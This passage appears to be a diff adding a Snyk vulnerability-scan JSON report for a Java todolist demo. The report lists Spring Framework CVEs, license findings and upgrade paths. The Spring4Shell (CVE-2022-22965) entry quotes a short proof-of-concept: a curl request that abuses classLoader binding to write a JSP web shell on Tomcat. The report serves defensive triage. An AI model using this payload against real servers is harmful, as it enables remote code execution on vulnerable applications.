"[6.0.0,6.0.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.24.RELEASE", + "5.3.27", + "6.0.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 6.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-expression", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f", + "title": "GitHub Commit" + }, + { + "url": "https://spring.io/security/cve-2023-20863", + "title": "Vulnerability Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:01:15.433654Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:09.820460Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling when a user provides a very long `SpEL` expression.\n## Remediation\nUpgrade `org.springframework:spring-expression` to version 5.2.24.RELEASE, 5.3.27, 6.0.8 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/965a6392757d20f9db19241126fcc719a51eac15)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/b73f5fcac22555f844cf27a7eeb876cb9d7f7f7e)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/ebc82654282bda547fbc20a9749ab1bda886a46f)\n- [Vulnerability Advisory](https://spring.io/security/cve-2023-20863)\n", + "epssDetails": { + "percentile": "0.70100", + "probability": "0.00306", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-20863" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.springframework:spring-expression", + "proprietary": false, + "creationTime": "2023-04-14T06:33:20.884492Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-04-14T06:25:45Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-expression" + }, + "publicationTime": "2023-04-14T06:33:21.063044Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:09.820460Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-expression@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.springframework:spring-expression", + "version": "3.2.6.RELEASE", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2436751", + "title": "Remote Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ] + }, + "exploit": "High", + "fixedIn": [ + "5.2.20", + "5.3.18" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "filePath": "org/springframework/beans/CachedIntrospectionResults.java", + "className": "CachedIntrospectionResults", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html", + "title": "CyberKendra Post" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15", + "title": "GitHub Commit" + }, + { + "url": "https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/", + "title": "LunaSec Blog" + }, + { + "url": "https://blog.payara.fish/payara-and-spring4shell", + "title": "Payara Blogpost" + }, + { + "url": "https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara", + "title": "Payara PoC" + }, + { + "url": "https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/", + "title": "Snyk Blog - Technical Breakdown" + }, + { + "url": "https://github.com/Kirill89/CVE-2022-22965-PoC", + "title": "Snyk PoC" + }, + { + "url": "https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement", + "title": "Spring Security Announcement" + }, + { + "url": "https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative", + "title": "Spring Tomcat Mitigation Advice" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-30T15:25:03.231650Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:12.628867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:15.463472Z" + } + ], + "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Remote Code Execution via manipulation of `ClassLoader` that is achievable with a POST HTTP request. This could allow an attacker to execute a webshell on a victim's application (TomCat), or download arbitrary files from the server (Payara/Glassfish).\r\n\r\n**Note:** \r\n* Current public exploits require victim applications to be built with JRE version 9 (or above) and to be deployed on either Tomcat, Payara, or Glassfish. \r\n\r\n* However, we have confirmed that it is technically possible for additional exploits to work under additional application configurations as well. \r\n\r\n* As such, while we recommend users prioritize first remediating against the configuration described above, for full protection, we also recommend upgrading all vulnerable versions to the fixed `spring-beans` version regardless of the application configuration.\r\n\r\n### Update Log \r\n* **31/03/2022 -** Severity was raised from 8.1 to 9.8\r\n* **08/04/2022 -** Advisory was updated to reflect that Snyk's security research team was able to author a working PoC of this vulnerability against applications that are deployed on Payara (which is based on Glassfish). \r\n\r\n\r\n## PoC\r\n```java\r\n1/ docker run -p 8888:8080 --rm --interactive --tty --name vm1 tomcat:9.0\r\n2/ ./mvnw install\r\n3/ docker cp target/handling-form-submission-complete.war vm1:/usr/local/tomcat/webapps\r\n4/ curl -X POST \\\r\n -H \"pre:<%\" \\\r\n -H \"post:;%>\" \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.pattern=%{pre}iSystem.out.println(123)%{post}i' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/handling-form-submission-complete' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.prefix=rce' \\\r\n -F 'class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=' \\\r\n http://localhost:8888/handling-form-submission-complete/greeting\r\n5/ curl http://localhost:8888/handling-form-submission-complete/rce.jsp\r\n```\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.20, 5.3.18 or higher.\n## References\n- [CyberKendra Post](https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/002546b3e4b8d791ea6acccb81eb3168f51abb15)\n- [LunaSec Blog](https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/)\n- [Payara Blogpost](https://blog.payara.fish/payara-and-spring4shell)\n- [Payara PoC](https://github.com/CalumHutton/CVE-2022-22965-PoC_Payara)\n- [Snyk Blog - Technical Breakdown](https://snyk.io/blog/spring4shell-zero-day-rce-spring-framework-explained/)\n- [Snyk PoC](https://github.com/Kirill89/CVE-2022-22965-PoC)\n- [Spring Security Announcement](https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement)\n- [Spring Tomcat Mitigation Advice](https://spring.io/blog/2022/04/01/spring-framework-rce-mitigation-alternative)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2022/CVE-2022-22965.yaml)\n", + "epssDetails": { + "percentile": "0.99975", + "probability": "0.97485", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22965" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-03-30T21:42:31.436000Z", + "functions_new": [ + { + "version": [ + "[ ,5.2.20)", + "[5.3.0, 5.3.18)" + ], + "functionId": { + "className": "org.springframework.beans.CachedIntrospectionResults", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2022-03-30T21:42:24Z", + "exploitDetails": { + "sources": [ + "CISA", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-03-30T22:32:44Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:17.474380Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE", + "severityWithCritical": "critical" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2823313", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Rob Ryan" + ], + "semver": { + "vulnerable": [ + "[,5.2.22.RELEASE)", + "[5.3.0,5.3.20)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.2.22.RELEASE", + "5.3.20" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-beans", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583", + "title": "GitHub Commit" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22970", + "title": "Tanzu vmware" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:21.626910Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:28.086179Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:48.407397Z" + } + ], + "description": "## Overview\n[org.springframework:spring-beans](https://www.baeldung.com/spring-bean) is a package that is the basis for Spring Framework's IoC container. The BeanFactory interface provides an advanced configuration mechanism capable of managing any type of object.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) if it relies on data binding to set a `MultipartFile` or `javax.servlet.Part` to a field in a model object.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `org.springframework:spring-beans` to version 5.2.22.RELEASE, 5.3.20 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/50177b1ad3485bd44239b1756f6c14607476fcf2)\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/83186b689f11f5e6efe7ccc08fdeb92f66fcd583)\n- [Tanzu vmware](https://tanzu.vmware.com/security/cve-2022-22970)\n", + "epssDetails": { + "percentile": "0.75300", + "probability": "0.00449", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22970" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.springframework:spring-beans", + "proprietary": false, + "creationTime": "2022-05-12T08:45:35.744127Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-05-12T08:17:10Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-beans" + }, + "publicationTime": "2022-05-12T09:49:10.833602Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:48.407397Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE", + "org.springframework:spring-beans@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.springframework:spring-beans", + "version": "3.2.6.RELEASE", + "severityWithCritical": "medium" + }, + { + "id": "SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634", + "title": "Improper Handling of Case Sensitivity", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.2.21)", + "[5.3.0, 5.3.19)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "5.2.21", + "5.3.19" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "low", + "cvssScore": 3.7, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.springframework:spring-context", + "references": [ + { + "url": "https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/spring-projects/spring-framework/issues/28333", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/MarcinGadz/spring-rce-poc", + "title": "PoC" + }, + { + "url": "https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968", + "title": "Spring Blog Post" + }, + { + "url": "https://tanzu.vmware.com/security/cve-2022-22968", + "title": "Tanzu Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:47:26.822810Z" + }, + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N/E:P", + "assigner": "Snyk", + "severity": "low", + "baseScore": 3.7, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:31.233852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:26.822810Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:16.458425Z" + } + ], + "description": "## Overview\n\nAffected versions of this package are vulnerable to Improper Handling of Case Sensitivity via the patterns for `disallowedFields` on a `DataBinder`. As a result, a field is not effectively protected unless it is listed with both upper and lower case for the first character of the field, including nested fields within the property path.\n## Remediation\nUpgrade `org.springframework:spring-context` to version 5.2.21, 5.3.19 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/833e750175349ab4fd502109a8b41af77e25cdea)\n- [GitHub Issue](https://github.com/spring-projects/spring-framework/issues/28333)\n- [PoC](https://github.com/MarcinGadz/spring-rce-poc)\n- [Spring Blog Post](https://spring.io/blog/2022/04/13/spring-framework-data-binding-rules-vulnerability-cve-2022-22968)\n- [Tanzu Advisory](https://tanzu.vmware.com/security/cve-2022-22968)\n", + "epssDetails": { + "percentile": "0.29205", + "probability": "0.00065", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2022-22968" + ], + "CWE": [ + "CWE-178" + ] + }, + "packageName": "org.springframework:spring-context", + "proprietary": false, + "creationTime": "2022-04-14T11:54:10.207823Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2022-04-14T11:43:54Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.springframework", + "artifactId": "spring-context" + }, + "publicationTime": "2022-04-14T12:09:40Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:49:16.458425Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.springframework:spring-context@3.2.6.RELEASE" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.springframework:spring-context", + "version": "3.2.6.RELEASE", + "severityWithCritical": "low" + }, + { + "id": "snyk:lic:maven:org.aspectj:aspectjweaver:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.5.4,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.aspectj:aspectjweaver", + "creationTime": "2024-06-18T21:24:04.112Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T21:24:04.112Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.aspectj:aspectjweaver@1.8.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.aspectj:aspectjweaver", + "version": "1.8.2", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[4.0.0.CR1,)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.hibernate.common:hibernate-commons-annotations", + "creationTime": "2024-06-18T11:03:46.980Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:03:46.980Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.common:hibernate-commons-annotations@4.0.5.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate.common:hibernate-commons-annotations", + "version": "4.0.5.Final", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate.javax.persistence:hibernate-jpa-2.1-api:EPL-1.0", + "type": "license", + "title": "EPL-1.0 license", + "semver": { + "vulnerable": [ + "[1.0.0.Final,)" + ] + }, + "license": "EPL-1.0", + "language": "java", + "description": "EPL-1.0 license", + "packageName": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "creationTime": "2024-06-18T12:03:42.953Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T12:03:42.953Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "org.hibernate.javax.persistence:hibernate-jpa-2.1-api@1.0.0.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate.javax.persistence:hibernate-jpa-2.1-api", + "version": "1.0.0.Final", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-entitymanager:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.5.0.Beta-1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-entitymanager", + "creationTime": "2024-06-18T11:52:01.913Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T11:52:01.913Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-entitymanager@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.hibernate:hibernate-entitymanager", + "version": "4.3.7.Final", + "severityWithCritical": "medium" + }, + { + "id": "snyk:lic:maven:org.jboss.logging:jboss-logging:LGPL-2.1", + "type": "license", + "title": "LGPL-2.1 license", + "semver": { + "vulnerable": [ + "[3.0.1.GA, 3.1.2.GA)" + ] + }, + "license": "LGPL-2.1", + "language": "java", + "description": "LGPL-2.1 license", + "packageName": "org.jboss.logging:jboss-logging", + "creationTime": "2024-06-18T02:47:02.411Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:47:02.411Z", + "severity": "medium", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-validator@4.3.1.Final", + "org.jboss.logging:jboss-logging@3.1.0.CR2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "org.jboss.logging:jboss-logging", + "version": "3.1.0.CR2", + "severityWithCritical": "medium" + } + ], + "upgrade": { + "com.fasterxml.jackson.core:jackson-core@2.6.5": { + "upgradeTo": "com.fasterxml.jackson.core:jackson-core@2.8.6", + "upgrades": [ + "com.fasterxml.jackson.core:jackson-core@2.6.5", + "com.fasterxml.jackson.core:jackson-core@2.6.5" + ], + "vulns": [ + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31519", + "SNYK-JAVA-COMFASTERXMLJACKSONCORE-31520" + ] + }, + "com.fasterxml.jackson.core:jackson-databind@2.6.5": { + "upgradeTo": "com.fasterxml.jackson.core:jackson-databind@2.12.7.1", + "upgrades": [ + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + "com.fasterxml.jackson.core:jackson-databind@2.6.5", + 